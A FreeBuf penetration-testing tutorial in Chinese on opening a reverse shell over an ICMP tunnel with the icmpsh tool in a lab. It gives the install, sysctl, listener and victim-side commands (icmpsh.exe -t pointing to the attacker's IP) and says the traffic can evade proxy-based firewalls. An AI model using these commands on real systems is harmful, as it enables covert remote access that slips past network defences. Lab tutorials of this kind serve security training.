freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

利用icmpsh建立icmp隧道反弹shell
2020-09-24 08:17:38

首先在kali上安装icmpsh软件,软件地址https://github.com/inquisb/icmpsh.git

我们可以直接用git克隆过来git clone https://github.com/inquisb/icmpsh.git

1600501868_5f65b86c8b9ce40276a19.png!small

然后我们还需要来安装python-impacket类库以保证对TCP、UDP、ICMP等协议的访问

pip2 install impacket

1600506497_5f65ca81d66317fce621a.png!small

接下来我们还需要关闭我们之前的ping命令应答程序,这样可以防止内核自己对ping包进行响应。

sysctl -w net.ipv4.icmp_echo_ignore_all=1

实验完成后开启系统ping的话将最后的1改为0即可

1600502387_5f65ba732ebb5503d7b4a.png!small

然后可以在kali上开始监听

python icmpsh_m.py 本机ip 目标ip

1600506605_5f65caeda91719fd3528e.png!small

再把icmpsh.exe传输到靶机上

1600506646_5f65cb16903124e663eba.png!small

1600506669_5f65cb2d6826d81b27a21.png!small

icmpsh.exe -t 192.168.110.140   -t后面接上攻击机的ip地址   回车

1600506815_5f65cbbf8945c31c16117.png!small

接收到shell。由于数据是利用PING请求/回复报文通过网络层传输,因此并不需要指定服务或者端口。这种流量是无法被基于代理的防火墙检测到的,因此这种方式可能绕过一些防火墙规则。

本文作者:, 转载请注明来自FreeBuf.COM

# 渗透测试 # 内网安全
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
评论 按时间排序

登录/注册后在FreeBuf发布内容哦

相关推荐
  • 0 文章数
  • 0 评论数
  • 0 关注者
登录 / 注册后在FreeBuf发布内容哦
收入专辑